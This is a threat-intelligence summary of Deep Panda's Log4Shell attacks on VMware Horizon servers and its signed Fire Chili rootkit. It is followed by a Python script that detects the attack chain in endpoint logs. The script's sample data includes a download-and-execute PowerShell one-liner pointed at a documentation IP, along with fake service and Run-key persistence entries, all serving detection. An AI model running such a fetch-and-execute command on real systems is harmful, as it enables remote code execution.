2022-04-05

Deep Panda & Fire Chili Rootkits

Level: Tactical | Source: Fortinet
Academic
Financial


Researchers at FortiGuard Labs have identified the Chinese APT group Deep Panda exploiting the Log4Shell vulnerability and deploying a new digitally signed rootkit, dubbed Fire Chili. The signing certificates were stolen from game development companies Frostburn Studios and the Korean 433CCR Company. The attack chain begins with a Log4Shell exploit against a vulnerable VMware Horizon server, which spawns an encoded PowerShell command to download and execute scripts, ending with the installation of a malicious DLL. Persistence is achieved by creating a service and a registry entry. At the time of writing, the Fire Chili rootkit has a low detection rate on VirusTotal.
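The chain summarized above has three observable stages a detection engineer can key on: a PowerShell process with an encoded command spawned by the Horizon server's own web component, a new service installed from an unusual path, and a value written to a Run key. The script below is an added example written for this summary, not code from Fortinet, Anvilogic or Deep Panda's tooling. It assumes endpoint telemetry normalized into simple dicts (field names are the example's own), assumes Horizon's server binaries live under the default `VMware\VMware View\Server` directory (adjust for your deployment), and runs over constructed sample events, including a base64/UTF-16LE payload it builds itself.

```python
import base64
import re

# Assumption: Horizon's web/server components live under this install directory.
HORIZON_DIR_HINT = "\\vmware\\vmware view\\server\\"
# Matches -e, -ec, -enc and -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
# Strings that commonly appear in a "download and execute" stage-one script.
DOWNLOAD_CUES = ("net.webclient", "downloadstring", "downloadfile",
                 "invoke-webrequest", "iwr", "invoke-expression", "iex")
RUN_KEY = "\\currentversion\\run"
USER_WRITABLE = ("\\programdata\\", "\\temp\\", "\\users\\public\\", "\\appdata\\")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64.
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Apply the three stage checks; return a list of (event_index, reason) findings."""
    findings = []
    for i, ev in enumerate(events):
        kind = ev["kind"]
        if kind == "process":
            parent = ev["parent_image"].lower()
            image = ev["image"].lower()
            if HORIZON_DIR_HINT in parent and image.endswith("powershell.exe"):
                decoded = decode_encoded_command(ev["command_line"])
                if decoded is not None:
                    cues = [c for c in DOWNLOAD_CUES if c in decoded.lower()]
                    findings.append((i, "horizon-spawned encoded powershell; cues=" + ",".join(cues)))
        elif kind == "service_install":  # Windows System log Event ID 7045
            path = ev["image_path"].lower()
            if any(d in path for d in USER_WRITABLE) or ".dll" in path:
                findings.append((i, "service installed from unusual path: " + ev["image_path"]))
        elif kind == "registry_set":
            if RUN_KEY in ev["key"].lower():
                findings.append((i, "run-key persistence: " + ev["value_name"]))
    return findings


# Constructed sample telemetry. The stage-one script and all paths are made up for the example;
# 198.51.100.7 is a documentation-range address, not a real indicator.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage1.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"kind": "process",
     "parent_image": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "image": PS_EXE,
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"kind": "process",  # benign admin script launched from the desktop: no finding
     "parent_image": r"C:\Windows\explorer.exe",
     "image": PS_EXE,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"kind": "service_install", "service_name": "UpdateSvc",
     "image_path": r"C:\ProgramData\sys\helper.dll"},
    {"kind": "service_install", "service_name": "Spooler",  # legitimate: no finding
     "image_path": r"C:\Windows\System32\spoolsv.exe"},
    {"kind": "registry_set",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "helper",
     "data": r"rundll32.exe C:\ProgramData\sys\helper.dll,Start"},
]

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

Run as-is it flags events 0, 2 and 4 and leaves the two benign events alone. The parent-process check is the high-signal part: a Horizon server process has no business launching PowerShell at all, so even an encoded command that decodes to nothing recognisable is worth a ticket; the cue list only adds context for the analyst.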

